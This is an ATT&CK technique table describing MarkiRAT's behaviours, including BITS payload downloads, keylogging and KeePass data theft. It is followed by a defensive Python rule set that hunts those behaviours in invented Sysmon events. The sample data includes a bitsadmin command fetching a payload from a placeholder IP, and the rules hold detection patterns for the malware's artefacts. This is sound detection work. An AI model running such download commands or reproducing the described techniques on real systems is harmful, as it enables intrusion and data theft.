Domain | ID | Name | Use
--- | --- | --- | ---
enterprise | T1071 | Application Layer Protocol | -
enterprise | T1071.001 | Web Protocols | MarkiRAT can initiate communication over HTTP/HTTPS with its C2 server.
enterprise | T1197 | BITS Jobs | MarkiRAT can use the BITS utility to connect to its C2 server.
enterprise | T1547 | Boot or Logon Autostart Execution | -
enterprise | T1547.001 | Registry Run Keys / Startup Folder | MarkiRAT can drop its payload into the Startup directory so that it runs automatically when the compromised system starts.
enterprise | T1547.009 | Shortcut Modification | MarkiRAT can modify the shortcut that launches Telegram, replacing its target path with the malicious payload so that the payload launches along with the legitimate executable.
enterprise | T1115 | Clipboard Data | MarkiRAT can capture clipboard content.
enterprise | T1059 | Command and Scripting Interpreter | -
enterprise | T1059.003 | Windows Command Shell | MarkiRAT can use cmd.exe to execute commands in a victim’s environment.
enterprise | T1555 | Credentials from Password Stores | -
enterprise | T1555.005 | Password Managers | MarkiRAT can gather information from the KeePass password manager.
enterprise | T1005 | Data from Local System | MarkiRAT can upload data from the victim’s machine to the C2 server.
enterprise | T1074 | Data Staged | -
enterprise | T1074.001 | Local Data Staging | MarkiRAT can store collected data locally in a created .nfo file.
enterprise | T1041 | Exfiltration Over C2 Channel | MarkiRAT can exfiltrate locally stored data via its C2 channel.
enterprise | T1083 | File and Directory Discovery | MarkiRAT can look for files with specific extensions such as .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb.
enterprise | T1105 | Ingress Tool Transfer | MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin.
enterprise | T1056 | Input Capture | -
enterprise | T1056.001 | Keylogging | MarkiRAT can capture all keystrokes on a compromised host.
enterprise | T1036 | Masquerading | -
enterprise | T1036.005 | Match Legitimate Name or Location | MarkiRAT can masquerade as update.exe and svehost.exe; it has also mimicked legitimate Telegram and Chrome files.
enterprise | T1106 | Native API | MarkiRAT can run the ShellExecuteW API via the Windows Command Shell.
enterprise | T1057 | Process Discovery | MarkiRAT can search for different processes on a system.
enterprise | T1113 | Screen Capture | MarkiRAT can capture screenshots, which are initially saved as ‘scr.jpg’.
enterprise | T1518 | Software Discovery | MarkiRAT can check for the Telegram installation directory by enumerating the files on disk.
enterprise | T1518.001 | Security Software Discovery | MarkiRAT can check the running processes on the victim’s machine for Kaspersky and Bitdefender antivirus products.
enterprise | T1082 | System Information Discovery | MarkiRAT can obtain the computer name from a compromised host.
enterprise | T1614 | System Location Discovery | -
enterprise | T1614.001 | System Language Discovery | MarkiRAT can use the GetKeyboardLayout API to check whether a compromised host’s keyboard is set to Persian.
enterprise | T1033 | System Owner/User Discovery | MarkiRAT can retrieve the victim’s username.
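Several rows in the table above describe host artefacts that are directly huntable in endpoint telemetry: BITSAdmin transfers from a URL (T1197/T1105), the svehost.exe/update.exe lookalike names (T1036.005), an executable dropped into the Startup folder (T1547.001), a Telegram shortcut rewritten by a process that is not Telegram (T1547.009), and the scr.jpg screenshot staging file (T1113). The following is an added example, not code from the original page or from any MarkiRAT analysis: a small rule set run over constructed, Sysmon-style process-creation (EID 1) and file-creation (EID 11) events. The event records, paths, and the IP address in the sample command line are invented for illustration, and the rules are written from the table's wording rather than from MarkiRAT samples.

```python
"""Hunting rules for the MarkiRAT behaviours in the ATT&CK table (added example).

Input is a list of dicts mimicking Sysmon event 1 (process create) and event 11
(file create). Only the fields used here are modelled.
"""
import ntpath
import re

# Regexes are case-insensitive because NTFS paths are.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"^[A-Z]:\\(Users|ProgramData|Windows\\Temp)\\", re.IGNORECASE)

# Constructed sample telemetry (not real events). Event 5 is benign noise.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high "
                r"http://198.51.100.7/u.bin C:\Users\u\AppData\Roaming\update.exe",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "image": r"C:\Users\u\AppData\Roaming\svehost.exe",
     "cmdline": "svehost.exe", "parent": r"C:\Users\u\AppData\Roaming\update.exe"},
    {"id": 11, "image": r"C:\Users\u\AppData\Roaming\svehost.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"},
    {"id": 11, "image": r"C:\Users\u\AppData\Roaming\svehost.exe",
     "target": r"C:\Users\u\AppData\Roaming\Telegram Desktop\scr.jpg"},
    {"id": 11, "image": r"C:\Users\u\AppData\Roaming\svehost.exe",
     "target": r"C:\Users\u\Desktop\Telegram.lnk"},
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "parent": r"C:\Windows\System32\services.exe"},
]


def basename(path):
    """Lower-cased final path component; ntpath handles backslashes on any OS."""
    return ntpath.basename(path).lower()


def hunt(events):
    """Return one hit dict per matched rule: {"event": index, "technique": id, "why": text}."""
    hits = []
    for i, ev in enumerate(events):
        img = basename(ev.get("image", ""))
        if ev["id"] == 1:
            cmd = ev.get("cmdline", "")
            # T1197 / T1105: BITSAdmin pulling a payload from a URL.
            if img == "bitsadmin.exe" and re.search(r"/transfer", cmd, re.I) \
                    and re.search(r"https?://", cmd, re.I):
                hits.append({"event": i, "technique": "T1197",
                             "why": "bitsadmin /transfer from a URL"})
            # T1036.005: svehost.exe never exists legitimately; update.exe is only
            # suspicious when it runs from a user-writable location.
            if img == "svehost.exe":
                hits.append({"event": i, "technique": "T1036.005",
                             "why": "svehost.exe mimics svchost.exe"})
            elif img == "update.exe" and USER_WRITABLE_RE.match(ev.get("image", "")):
                hits.append({"event": i, "technique": "T1036.005",
                             "why": "update.exe executed from a user-writable path"})
        elif ev["id"] == 11:
            tgt = ev.get("target", "")
            low = tgt.lower()
            # T1547.001: executable or shortcut written to the Startup folder.
            if STARTUP_RE.search(tgt) and low.endswith((".exe", ".lnk")):
                hits.append({"event": i, "technique": "T1547.001",
                             "why": "executable dropped in Startup folder"})
            # T1547.009: a Telegram shortcut rewritten by something other than
            # Telegram itself or the shell.
            if low.endswith(".lnk") and "telegram" in basename(tgt) \
                    and img not in ("telegram.exe", "explorer.exe"):
                hits.append({"event": i, "technique": "T1547.009",
                             "why": f"Telegram shortcut written by {img}"})
            # T1113: the staging filename from the table; low confidence on its own.
            if basename(tgt) == "scr.jpg":
                hits.append({"event": i, "technique": "T1113",
                             "why": "screenshot staging file scr.jpg created"})
    return hits


if __name__ == "__main__":
    for h in hunt(EVENTS):
        print(f"event {h['event']}: {h['technique']} - {h['why']}")
```

The scr.jpg and update.exe rules are deliberately weak on their own and are meant to be correlated with the stronger ones (bitsadmin from a URL, svehost.exe, a non-Telegram writer of Telegram.lnk) on the same host before raising an alert.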